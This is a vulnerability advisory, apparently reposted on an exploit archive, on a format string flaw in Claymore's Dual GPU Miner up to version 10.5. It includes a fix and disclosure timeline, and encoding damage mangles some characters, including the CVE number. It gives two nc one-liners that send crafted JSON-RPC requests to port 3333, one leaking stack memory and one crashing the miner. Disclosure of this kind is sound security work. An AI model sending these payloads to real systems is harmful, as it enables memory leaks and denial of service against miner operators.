Claymore Dual GPU Miner 10.5 Format String Vulnerability

Claymore Dual Gpu Miner <= 10.5 Format Strings Vulnerability
=======================================================================

             product: Claymore's Dual Miner
  vulnerable version: <= 10.5
       fixed version: 10.6
          CVE number: - CVE-2018a6317
              impact: critical
            homepage: https://bitcointalk.org/index.php?topic=1433925.0
               found: 2018-01-26
                  by: twitter.com/res1n

=======================================================================


Vulnerability overview/description:
-----------------------------------
Claymoreas Dual GPU Miner 10.5 and below is vulnerable to a format 
strings vulnerability. This allows an unauthenticated remote attacker to 
read memory addresses, or immediately terminate the mining process 
causing a denial of service.

1) By sending a custom request to the json api on port 3333 of the 
remote management service it's possible to leak stack addresses and 
possibly rewrite stack addresses with %p.  I wasn't able to break out of 
the json padding but someone else may be able to as %s also dumps string 
contents.

example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%x %x %x %x"}' | nc 
192.168.1.139 3333 & printf "\n".

2) Sending %n to the json api on port 3333 immediately kills the mining 
process.

example - echo -e '{"id":1,"jsonrpc":"1.0","method":"%n"}' | nc 
192.168.1.139 3333 & printf "\n".

Solution
------------------------
Upgrade to version 10.6


Vendor contact timeline:
------------------------
01/26/18aaaReported to dev
01/26/18 a Confirmed and immediately patched. 10.6 released request for 
3a4 day embargo
01/31/18aaaPublic Disclosure

Writeup - 
https://medium.com/secjuice/claymore-dual-gpu-miner-10-5-format-strings-vulnerability-916ab3d2db30

#  0day.today [2018-02-17]  #